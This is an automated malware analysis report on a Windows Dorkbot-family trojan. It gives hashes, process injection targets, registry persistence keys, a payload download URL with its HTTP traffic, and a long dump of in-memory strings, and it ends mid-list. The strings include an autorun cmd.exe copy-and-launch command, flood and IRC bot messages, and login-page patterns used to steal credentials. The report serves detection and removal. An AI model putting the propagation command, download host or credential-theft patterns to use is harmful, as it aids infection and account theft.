HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1788241 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f55a0406f35164f2c0241f80119af195
SHA1: 48390c2104038a926ab4a76f0dbf14b8ff7c3ea6
SHA256: 4491e796d4c7558c5c01af17826cc26f1c5aeca2124bd7e6bca2bf8e15d25565
SSDeep: 3072:msvNBOlkH1W/mXMDIDJYv1cYHvxlRbovx7:lvVgxGYHbRUvZ
Size: 122880 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-08-01 20:53:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through MSN Messenger. |
DNSBlocker | A program can block designated DNS servers to make it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register for device notifications with RegisterDeviceNotification. It is then notified when a USB device is plugged in, and the worm copies itself to that USB device. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2892
yhtdayrg.exe:3644
ksaduytr.exe:3120
ksaduytr.exe:2096
The Trojan injects its code into the following process(es):
kusadtylds.exe:3336
calc.exe:2704
%original file name%.exe:3188
notepad.exe:3436
svchost.exe:3856
hsadjku.exe:972
svchost.exe:340
mscorsvw.exe:424
jqs.exe:480
csrss.exe:692
winlogon.exe:716
services.exe:760
svchost.exe:928
svchost.exe:1012
svchost.exe:1096
svchost.exe:1144
svchost.exe:1188
spoolsv.exe:1432
Explorer.EXE:1948
wmiprvse.exe:3704
Mutexes
The following mutexes were created/opened:
CTF.LBES.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.TMD.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003
CTF.TimListCache.FMPDefaultS-1-5-21-796845957-1563985344-1801674531-1003MUTEX.DefaultS-1-5-21-796845957-1563985344-1801674531-1003
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetStartupMutex
WininetProxyRegistryMutex
WininetConnectionMutex
RasPbFile
ZonesCounterMutex
!IETld!Mutex
ZoneAttributeCacheCounterMutex
ZonesCacheCounterMutex
ZonesLockedCacheCounterMutex
-c1419a97Mutex
File activity
The process kusadtylds.exe:3336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\wxajyh[1].asp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
The process %original file name%.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (2037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe (8408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yhtdayrg.exe (28676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\zpm[1].exe (12412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ng[1].exe (18569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bet[1].exe (33497 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (0 bytes)
The process yhtdayrg.exe:3644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
The Trojan deletes the following file(s):
%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)
The process ksaduytr.exe:2096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe.gonewiththewings (0 bytes)
Registry activity
The process kusadtylds.exe:3336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 82 F4 35 C4 7D 75 66 88 F0 95 D5 E5 7A 95 F5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"WireLMode" = "4D 94 B2 5A 22 C7 85 09 02 2C F8 E2 39 EE 72 7E"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftStCnt" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process calc.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 12 7E FC DD 29 40 93 0B F0 2C 13 E4 9F C0 5A"
The process %original file name%.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 BA 4C 3B 4F C6 FD A1 23 BE 03 5F 82 E3 6F FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1406915613"
"Name" = "%original file name%.exe"
The process notepad.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 23 4E 03 9D 9A F8 5C 80 28 66 39 A3 15 30 93"
The process yhtdayrg.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 AA 19 FB A6 15 E9 4F 3A 82 AC 94 89 FF 1B F3"
[HKCU\Software\Classes\CLSID\{2179B320-CEA1-A045-9594-6F24DF82DCD3}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"
[HKCU\Software\Win7zip]
"uuid" = "21 79 B3 20 CE A1 A0 45 95 94 6F 24 DF 82 DC D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Classes\CLSID\{2179B320-CEA1-A045-9594-6F24DF82DCD3}\0E7302EC\CG1]
"BID" = "20 00 08 00 05 00 08 00 DE 07 00 00 14 00 88 FF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uwozkyfqm.exe]
"DisableExceptionChainValidation" = ""
The process ksaduytr.exe:3120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 0F 82 F2 3D CB 3E 16 F4 29 BF F3 8F 96 EE 12"
The process ksaduytr.exe:2096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 F0 AD EC 74 0E F6 E6 76 FB 97 65 2F 73 E6 45"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
Dropped PE files
MD5 | File path |
---|---|
9b8ae040cb97b1fbb840c8f0589c5da0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\kusadtylds.exe |
13ddc13257824f83a3527b60fd3ebed0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bet[1].exe |
9b8ae040cb97b1fbb840c8f0589c5da0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\zpm[1].exe |
13ddc13257824f83a3527b60fd3ebed0 | c:\Program Files\Common Files\CreativeAudio\uwozkyfqm.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
A program can register for device notifications with RegisterDeviceNotification. It is then notified when a USB device is plugged in, and the worm copies itself to that USB device.
A worm can spread its copies through MSN Messenger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2892
yhtdayrg.exe:3644
ksaduytr.exe:3120
ksaduytr.exe:2096
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\wxajyh[1].asp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (2037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe (8408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yhtdayrg.exe (28676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\zpm[1].exe (12412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ng[1].exe (18569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bet[1].exe (33497 bytes)
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (673 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftStCnt" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 73529 | 73728 | 4.64967 | 91635d159f2b73914b6a6e2444dbd7e0 |
.rdata | 77824 | 14294 | 14336 | 3.8912 | 674ba75542f8bf23f5b6eb3af118facb |
.data | 94208 | 189160 | 14336 | 3.85561 | 7670f4636954fbd8da258eb5712d3f85 |
.rsrc | 286720 | 19352 | 19456 | 4.95966 | a819c8305ac54fce7569f8f104ebb751 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://54.191.185.232/bet.exe |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bet.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 54.191.185.232
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 10:40:01 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Tue, 05 Aug 2014 07:49:34 GMT
ETag: "41c43-39200-4ffdd18ba1561"
Accept-Ranges: bytes
Content-Length: 233984
Connection: close
Content-Type: application/octet-stream
Strings from Dumps
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\c1419a97
\\.\pipe\c1419a97
c:\%original file name%.exe
c:\%original file name%.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe
%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe
<pre>[d="%s" 
s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_3856_rwx_00B80000_00029000:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>*windows 
defender*</pre><pre>*windowsupdate*</pre><pre>*drweb*</pre><pre>dwwin.exe</pre><pre>kernel32.dll</pre><pre>iphlpapi.dll</pre><pre>GetExtendedTcpTable</pre><pre>GetOwnerModuleFromTcpEntry</pre><pre>%systemroot%</pre><pre>%programfiles%\Common Files\*\*.exe</pre><pre>%appdata%\Identities\*.exe</pre><pre>%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe</pre><pre>ole32.dll</pre><pre>/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"</pre><pre>%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe</pre><pre>%SystemRoot%\system32\SHELL32.dll</pre><pre>%s\c731200</pre><pre>%s\%s</pre><pre>%s\%s.lnk</pre><pre>Windows_Shared_Mutex_231_c000100</pre><pre>ntdll.dll</pre><pre>\ScreenSaverPro.scr</pre><pre>\temp.bin</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>gdi32.dll</pre><pre>rpcrt4.dll</pre><pre>netapi32.dll</pre><pre>*.exe</pre><pre>.gonewiththewings</pre><pre>*.gonewiththewings</pre><pre>WinExec</pre><pre>URLDownloadToFileA</pre><pre>http://www.google.com</pre><pre>\calc.exe</pre><pre>\Reader_sl.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>notepad.exe</pre><pre>\notepad.exe</pre><pre>\svchost.exe</pre><pre>WindowsId</pre><pre>Identities\%s</pre><pre>%s\%s\%s.exe</pre><pre>:Zone.Identifier</pre><pre>.quarantined</pre><pre>"%s" -shell</pre><pre>"%s" -bind</pre><pre>userinit.exe</pre><pre>explorer.exe</pre><pre>Windows critical error, require reboot</pre><pre>Windows 
Update</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>GetProcessHeap</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegOpenKeyA</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre>SetTcpEntry</pre><pre>SHLWAPI.dll</pre><pre>RPCRT4.dll</pre><pre>NETAPI32.dll</pre><pre>DNSAPI.dll</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>Software\WindowsId Manager Reader</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>WindowsMark</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>%System%\notepad.exe</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0A</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d 
(Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre
